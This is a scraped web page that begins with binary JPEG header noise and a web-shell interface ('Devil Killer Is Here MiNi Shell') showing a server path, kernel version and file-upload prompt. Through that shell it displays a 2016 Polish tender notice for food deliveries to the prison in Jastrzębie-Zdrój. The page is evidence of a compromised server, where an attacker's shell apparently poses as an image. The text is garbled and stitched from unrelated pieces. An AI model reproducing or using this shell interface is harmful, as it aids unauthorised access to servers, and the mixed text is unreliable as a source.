JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160211/30520-N-2016.html

<p class="kh_header"><b>Jastrzębie-Zdrój: Dostawy nabiału, tłuszczów, ryb, konserw rybnych, konserw mięsnych i innych artykułów spożywczych na potrzeby Zakładu Karnego w Jastrzebiu-Zdroju</b><br>
<b>Numer ogłoszenia: 30520 - 2016; data zamieszczenia: 11.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny , ul. C. K. Norwida 23, 44-268 Jastrzębie-Zdrój, woj. śląskie, tel. 32 4759230, faks 32 475 92 33.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy nabiału, tłuszczów, ryb, konserw rybnych, konserw mięsnych i innych artykułów spożywczych na potrzeby Zakładu Karnego w Jastrzebiu-Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia dotyczy dostawy nabiału, tłuszczów, konserw rybnych, konserw mięsnych 
i  innych art. spożywczych na potrzeby Zakładu Karnego w Jastrzębiu Zdroju.

Zamawiający ustala łączną wielkość zamówienia na : 

część I Ogólnospożywcze 
1.Cukier - 17000 kg
2.Liść laurowy - 16 kg
3.Ziele angielski - 30 kg
4.Majeranek - 12 kg
5.Pieprz naturalny czarny mielony - 160 kg 
6.Papryka mielona ostra - 45 kg
7.Przyprawa sucha ( typu Vegeta lub równoważne )- 270 kg
8.ocet - 600 L
9.Herbata expresowa ( torebki 1,5g )- 250 000 szt
10.Sól jadalna jodowana 3000 - kg
11.Przyprawa w płynie do zup - 1800 kg
12.kotlety sojowe - 1500 kg
13.Dżem ( wiaderka )- 250 kg
14.Marmolada ( wiaderka ) - 250 kg
15.Koncentrat pomidorowy 30%- 2800 kg
16.Fasola Jaś średni- 2000 kg ( worki nie przekraczające 15 kg )
17.Groch  łuskany - 2000 kg ( worki nie przekraczające 15 kg )
18.Syrop wysokosłodzony ( owocowy do sporządzania napojów dopuszcz.smaki: malina wiśnia, truskawka) opak 0,2 - 2Lit ) - 100 L
19.Zupa w proszku Żurek w opak. 1-5kg ( termin przydatności do spożycia min. 5 miesięcy). - 250 kg
20.Zupa w proszku Barszcz biały w opak. 1-5kg ( termin przydatności do spożycia min. 5 miesięcy) - 230 kg
21.Budyń bez cukru w opakowaniach 1-2 kg( termin przydatności do spożycia min.5 miesięcy)- 130 kg
22.Cynaon mielony - 35 kg
23.Zupa w proszku pieczarkowa w opak. 1-5kg ( termin przydatności do spożycia min. 5 miesięcy)        - 120 kg
24.Zupa w proszku brokułowa w opak. 1-5kg ( termin przydatności do spożycia min. 5 miesięcy ) - 120 kg
25.Czosnek granulowany - 30 kg
26.Oregano - 5 kg
27.Kminek - 5 kg
28.Pietruszka zielona sucha - 30 kg
29.Koper suchy - 40 kg
30.Musztarda - 150 kg ( pojemniki waga do 5 kg)
część II (Ryby) CPV 152 20000-6
1.Filet z mintaja bez glazury mrożony w technologii shatterpack (SHP) w opakowaniach kartonowych do 25kg
- wygląd: brak oznak rozmrożenia, filety całe bez skóry, ości i obcych zanieczyszczeń;
- zapach: właściwy dla ryb mrożonych, po rozmrożeniu zapach ryby  świeżej, niedopuszczalny gnilny;
- tkanka mięsna: jasna o naturalnej barwie, charakterystycznej dla danego gatunku, bez plam i przebarwień; po rozmrożeniu sprężysta, nie rozpadająca się, o prawidłowym zapachu;
- właściwości fizykochemiczne i biologiczne: brak zanieczyszczeń fizycznych, chemicznych, brak oznak i obecności pleśni, szkodników, brak zanieczyszczeń mikrobiologicznych i bakterii chorobotwórczych.
Cechy dyskwalifikujące: filety  z uszkodzoną glazurą
Ryba mrożona musi posiadać co najmniej 30 dniowy termin przydatności do spożycia.
Ryby muszą być dostarczane w oryginalnych, nieuszkodzonych, szczelnych , zamkniętych, prawidłowo oznakowanych w języku polskim opakowaniach, z podaną informacją dotyczącą nazwy produktu, ilości, terminu ważności oraz nazwy i adresu producenta - 250 kg
2. Kotlet rybny - produkt garmażeryjny gotowy do spożycia.
Zawartość ryby nie mniej niż 40% masy mięsnej.
Opakowania kartonowe do 5kg
- wygląd: brak oznak uszkodzenia, kotlety bez  ości i obcych zanieczyszczeń;
- zapach: właściwy dla  ryby  świeżej, niedopuszczalny gnilny;
- właściwości fizykochemiczne i biologiczne: brak zanieczyszczeń fizycznych, chemicznych, brak oznak i obecności pleśni, szkodników, brak zanieczyszczeń mikrobiologicznych i bakterii chorobotwórczych.
Kotlety muszą posiadać co najmniej 5 dniowy termin przydatności do spożycia
Kotlety muszą być dostarczane w oryginalnych, nieuszkodzonych, szczelnych , zamkniętych, prawidłowo oznakowanych w języku polskim opakowaniach, z podaną informacją dotyczącą nazwy produktu, ilości, terminu ważności oraz nazwy i adresu producenta - 2200 kg

część III (konserwy rybne) CPV 152 40000-2

1.Szprot w sosie pomidorowym  z samootwieraczem - 1500 kg
2.Sałatka rybna typu Neptun lub równoważne z samootwieraczem - 2000 kg
3.Paprykarz szczeciński  z samootwieraczem - 1400 kg
4.Śledź w sosie pomidorowym  z samootwieraczem - 1400 kg
(dowolne opakowanie o gramaturze w pełnych dziesiątkach gram np. 200g, 330g- nie dopuszcza się opakowań o wadze np. 225g, 175g,  itp)  

część IV (Tłuszcze) CPV 15431000-8 
1.Tłuszcz roślinny (typu Margaryna) do smarowania pieczywa zawartość tłuszczu min 20% w kostkach od 200g do 500g - 17000 kg
2.Tłuszcz roślinny do smarowania  ( typu Masło roślinne lub równoważne ) o zawartości tłuszczu 
od 60%  - 80% w kostkach od 150g do 300g - 1700 kg 
3.Olej  roślinny - 1400 L

część V (Mleko granulowane) CPV 155 11000-3
Mleko odtłuszczone granulowane ( minimalna zawartość białka 34%, bez domieszki oleju roślinnego ), ( worki nie przekraczające 15 kg ) - 2000kg

część VI (Nabiał) grupa CPV 155
 
1.Ser twaróg półtłusty ( w kostkach o wadze 0,2-1kg ) - 6000 kg
2.Serek fromage naturalny ( w opakowaniu 100 gram)  - 500 kg
3.Serek granulowany czysty (w opak.100g -200g) - 500 kg
4.Śmietana 12% - 2400 L
5.Ser topiony czysty ( opak.100gram ) o zawartości tłuszczu nie mniej niż 27% - 1200 kg
6.Kefir - 2000 kg ( opakowania 5-10 kg )
7.Jogurt owocowy 100- 150 gr - 3000 szt 

część VII (Konserwy mięsne) CPV 15131000-5 
1.Pasztet drobiowy czysty ( bez dodatków) w  alupack *- 1500 kg
2.Konserwy mięsne ok. 300g (plus minus 10g) z samootwieraczem **- 2000 kg
3.Konserwy wieprzowa mielona sterylizowana -w alupack * - 920 kg
4.Szynka mielona drobiowa sterylizowana -w alupack * -  800 kg 

* o wadze w zakresie 90-130g w pełnych dziesiątkach gram, np. 90, 100, ..., 130g - nie dopuszcza się opakowań o wadze np. 95g, 105g,  itp)
** dowolne opakowanie o gramaturze w pełnych dziesiątkach gram np. 200g, 330g- nie dopuszcza się opakowań o wadze np. 225g, 175g,  itp.
Wszystkie objęte zamówieniem produkty dostarczane będą w opakowaniach dopuszczonych do kontaktu z żywnością. Do każdego opakowania powinna być dołączona etykieta z opisem jego zawartości, powinno zawierać: nazwę dostawcy - producenta, adres, nazwę produktu, masę netto produktu, datę - termin produkcji i przydatności do spożycia (należy spożyć do ... miesiąc, rok), oraz warunki przechowywania.

Zamawiający zobowiązuje jednocześnie Wykonawcę do tego, aby jakość dostarczanych artykułów spożywczych będących przedmiotem niniejszego zamówienia, sposób ich pakowania, a także rodzaj używanych opakowań zbiorczych oraz w stosowanych normach i powszechnie obowiązujących przepisach prawa powodowały obniżenie ponoszonych przez Zamawiającego kosztów przechowywania, przygotowania i dystrybucji dostarczanych artykułów i wytwarzanych z nich potraw oraz kosztów wywozu i utylizacji powstałych odpadów.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.89.00.00-3, 15.22.00.00-6, 15.24.00.00-2, 15.43.10.00-8, 15.51.10.00-3, 15.50.00.00-3, 15.13.10.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający rezygnuje z możliwości żądania wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający sprawdzi fakt złożenia podpisanego oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełniających ten warunek Zamawiający uzna Wykonawców, którzy przedstawią z wykorzystaniem wzoru zawartego w załączniku nr 12 wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, dostaw (dostawy) odpowiadających rodzajem przedmiotowi zamówienia, a także o łącznej wartości odpowiadającej co najmniej kwotom:
a)	100 000 zł dla części I (Art. ogólnospożywcze)
b)	18 000 zł dla części II (Ryby)
c)	45 000 zł dla części III (Konserwy rybne)
d)	71 000 zł dla części IV (Tłuszcze)
e)	28 000 zł dla części V (Mleko granulowane)
f)	100 000 zł dla części VI (Nabiał)
g)	 33 000 zł dla części VII (Konserwy mięsne)
Wykaz powinien zawierać informacje o wartości, przedmiocie, datach wykonania i podmiotach, na rzecz których dostawy zostały wykonane, wraz z załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający sprawdzi fakt złożenia podpisanego oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający sprawdzi fakt złożenia podpisanego oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający sprawdzi fakt złożenia podpisanego oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany ceny w przypadku zmiany stawki VAT. Zmiana ceny następuje z dniem wejścia w życie aktu prawnego zmieniającego stawkę, przy czym stawka netto pozostaje bez zmian przez okres ważności oferty (związania) oraz okres realizacji (wykonania) zamówienia. Wykonawca zawiadomi Zamawiającego o konieczności zmiany przedstawiając kopię odpowiednich dokumentów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Jastrzębiu-Zdroju
ul.C.K. Norwida 23
44-268 Jastrzębie-Zdrój.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.03.2016 godzina 10:00, miejsce: Zakład Karny w Jastrzębiu-Zdroju
ul.C.K. Norwida 23
44-268 Jastrzębie-Zdrój - SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Artykuły Ogólnospożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> część I Ogólnospożywcze 
1.Cukier - 17000 kg
2.Liść laurowy - 16 kg
3.Ziele angielski - 30 kg
4.Majeranek - 12 kg
5.Pieprz naturalny czarny mielony - 160 kg 
6.Papryka mielona ostra - 45 kg
7.Przyprawa sucha ( typu Vegeta lub równoważne )- 270 kg
8.ocet - 600 L
9.Herbata expresowa ( torebki 1,5g )- 250 000 szt
10.Sól jadalna jodowana 3000 - kg
11.Przyprawa w płynie do zup - 1800 kg
12.kotlety sojowe - 1500 kg
13.Dżem ( wiaderka )- 250 kg
14.Marmolada ( wiaderka ) - 250 kg
15.Koncentrat pomidorowy 30%- 2800 kg
16.Fasola Jaś średni- 2000 kg ( worki nie przekraczające 15 kg )
17.Groch  łuskany - 2000 kg ( worki nie przekraczające 15 kg )
18.Syrop wysokosłodzony ( owocowy do sporządzania napojów dopuszcz.smaki: malina wiśnia, truskawka) opak 0,2 - 2Lit ) - 100 L
19.Zupa w proszku Żurek w opak. 1-5kg ( termin przydatności do spożycia min. 5 miesięcy). - 250 kg
20.Zupa w proszku Barszcz biały w opak. 1-5kg ( termin przydatności do spożycia min. 5 miesięcy) - 230 kg
21.Budyń bez cukru w opakowaniach 1-2 kg( termin przydatności do spożycia min.5 miesięcy)- 130 kg
22.Cynaon mielony - 35 kg
23.Zupa w proszku pieczarkowa w opak. 1-5kg ( termin przydatności do spożycia min. 5 miesięcy)        - 120 kg
24.Zupa w proszku brokułowa w opak. 1-5kg ( termin przydatności do spożycia min. 5 miesięcy ) - 120 kg
25.Czosnek granulowany - 30 kg
26.Oregano - 5 kg
27.Kminek - 5 kg
28.Pietruszka zielona sucha - 30 kg
29.Koper suchy - 40 kg
30.Musztarda - 150 kg ( pojemniki waga do 5 kg)
Artykuły Ogólnospożywcze - dostawy nie rzadziej niż 1 raz w miesiącu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> część II (Ryby) 
1.Filet z mintaja bez glazury mrożony w technologii shatterpack (SHP) w opakowaniach kartonowych do 25kg
- wygląd: brak oznak rozmrożenia, filety całe bez skóry, ości i obcych zanieczyszczeń;
- zapach: właściwy dla ryb mrożonych, po rozmrożeniu zapach ryby  świeżej, niedopuszczalny gnilny;
- tkanka mięsna: jasna o naturalnej barwie, charakterystycznej dla danego gatunku, bez plam i przebarwień; po rozmrożeniu sprężysta, nie rozpadająca się, o prawidłowym zapachu;
- właściwości fizykochemiczne i biologiczne: brak zanieczyszczeń fizycznych, chemicznych, brak oznak i obecności pleśni, szkodników, brak zanieczyszczeń mikrobiologicznych i bakterii chorobotwórczych.
Cechy dyskwalifikujące: filety  z uszkodzoną glazurą
Ryba mrożona musi posiadać co najmniej 30 dniowy termin przydatności do spożycia.
Ryby muszą być dostarczane w oryginalnych, nieuszkodzonych, szczelnych , zamkniętych, prawidłowo oznakowanych w języku polskim opakowaniach, z podaną informacją dotyczącą nazwy produktu, ilości, terminu ważności oraz nazwy i adresu producenta - 250 kg
2. Kotlet rybny - produkt garmażeryjny gotowy do spożycia.
Zawartość ryby nie mniej niż 40% masy mięsnej.
Opakowania kartonowe do 5kg
- wygląd: brak oznak uszkodzenia, kotlety bez  ości i obcych zanieczyszczeń;
- zapach: właściwy dla  ryby  świeżej, niedopuszczalny gnilny;
- właściwości fizykochemiczne i biologiczne: brak zanieczyszczeń fizycznych, chemicznych, brak oznak i obecności pleśni, szkodników, brak zanieczyszczeń mikrobiologicznych i bakterii chorobotwórczych.
Kotlety muszą posiadać co najmniej 5 dniowy termin przydatności do spożycia
Kotlety muszą być dostarczane w oryginalnych, nieuszkodzonych, szczelnych , zamkniętych, prawidłowo oznakowanych w języku polskim opakowaniach, z podaną informacją dotyczącą nazwy produktu, ilości, terminu ważności oraz nazwy i adresu producenta - 2200 kg.</p></li>
